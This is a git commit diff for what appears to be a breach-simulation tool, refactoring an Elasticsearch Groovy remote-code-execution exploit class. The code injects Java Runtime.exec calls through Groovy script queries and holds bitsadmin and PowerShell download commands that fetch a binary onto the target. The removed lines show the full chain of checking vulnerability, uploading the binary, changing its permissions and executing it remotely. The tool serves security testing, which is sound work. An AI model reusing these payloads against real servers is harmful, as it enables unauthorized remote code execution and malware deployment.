Refactored elastic according to latest web_rce framework changes. Tested on windows and linux
This commit is contained in:
parent
76523e7379
commit
56b3190cb5
|
@ -7,13 +7,12 @@
|
||||||
import json
|
import json
|
||||||
import logging
|
import logging
|
||||||
import requests
|
import requests
|
||||||
from network.elasticfinger import ES_SERVICE, ES_PORT
|
|
||||||
from exploit.web_rce import WebRCE
|
from exploit.web_rce import WebRCE
|
||||||
from model import WGET_HTTP_UPLOAD
|
from model import WGET_HTTP_UPLOAD
|
||||||
|
|
||||||
import re
|
import re
|
||||||
|
|
||||||
__author__ = 'danielg'
|
__author__ = 'danielg, VakarisZ'
|
||||||
|
|
||||||
LOG = logging.getLogger(__name__)
|
LOG = logging.getLogger(__name__)
|
||||||
|
|
||||||
|
@ -31,55 +30,30 @@ class ElasticGroovyExploiter(WebRCE):
|
||||||
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
|
% """java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"""
|
||||||
JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m'
|
JAVA_GET_BIT_LINUX = JAVA_CMD % '/bin/uname -m'
|
||||||
|
|
||||||
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
|
|
||||||
|
|
||||||
# Both commands are prepared for use in future development
|
# Both commands are prepared for use in future development
|
||||||
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
|
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
|
||||||
POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing\\\""
|
POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s'" \
|
||||||
|
r" -OutFile '%(monkey_path)s' -UseBasicParsing\\\""
|
||||||
|
|
||||||
_TARGET_OS_TYPE = ['linux', 'windows']
|
_TARGET_OS_TYPE = ['linux', 'windows']
|
||||||
|
|
||||||
def __init__(self, host):
|
def __init__(self, host):
|
||||||
super(ElasticGroovyExploiter, self).__init__(host)
|
super(ElasticGroovyExploiter, self).__init__(host)
|
||||||
|
|
||||||
def exploit_host(self):
|
def get_exploit_config(self):
|
||||||
# self.exploit_host_linux()
|
exploit_config = super(ElasticGroovyExploiter, self).get_exploit_config()
|
||||||
if ES_SERVICE not in self.host.services:
|
exploit_config['dropper'] = True
|
||||||
LOG.info("Host: %s doesn't have ES open" % self.host.ip_addr)
|
exploit_config['url_extensions'] = ['_search?pretty']
|
||||||
return False
|
exploit_config['upload_commands'] = {'linux': WGET_HTTP_UPLOAD, 'windows': self.RDP_CMDLINE_HTTP}
|
||||||
# Build url from host and elastic port(not https)
|
return exploit_config
|
||||||
urls = self.build_potential_urls([[ES_PORT, False]], ['_search?pretty'])
|
|
||||||
vulnerable_urls = []
|
|
||||||
for url in urls:
|
|
||||||
if self.check_if_exploitable(url):
|
|
||||||
vulnerable_urls.append(url)
|
|
||||||
self._exploit_info['vulnerable_urls'] = vulnerable_urls
|
|
||||||
if not vulnerable_urls:
|
|
||||||
return False
|
|
||||||
|
|
||||||
if self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
|
def get_open_service_ports(self, port_list, names):
|
||||||
LOG.info("Host %s was already infected under the current configuration, done" % self.host)
|
# We must append elastic port we get from elastic fingerprint module because It's not marked as 'http' service
|
||||||
return True
|
valid_ports = super(ElasticGroovyExploiter, self).get_open_service_ports(port_list, names)
|
||||||
|
elastic_service = [service for service in self.host.services if 'elastic-search' in service][0]
|
||||||
if not self.set_host_arch(vulnerable_urls[0]):
|
elastic_port = [elastic_service.lstrip('elastic-search-'), False]
|
||||||
return False
|
valid_ports.append(elastic_port)
|
||||||
|
return valid_ports
|
||||||
commands = {'windows': self.RDP_CMDLINE_HTTP,
|
|
||||||
'linux': WGET_HTTP_UPLOAD}
|
|
||||||
|
|
||||||
data = self.upload_monkey(vulnerable_urls[0], commands)
|
|
||||||
|
|
||||||
# We can't use 'if not' because response may be ''
|
|
||||||
if data is not False and data['response'] is False:
|
|
||||||
return False
|
|
||||||
|
|
||||||
if self.change_permissions(vulnerable_urls[0], data['path']) is False:
|
|
||||||
return False
|
|
||||||
|
|
||||||
if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False:
|
|
||||||
return False
|
|
||||||
|
|
||||||
return True
|
|
||||||
|
|
||||||
def exploit(self, url, command):
|
def exploit(self, url, command):
|
||||||
command = re.sub(r"\\", r"\\\\\\\\", command)
|
command = re.sub(r"\\", r"\\\\\\\\", command)
|
||||||
|
|
Loading…
Reference in New Issue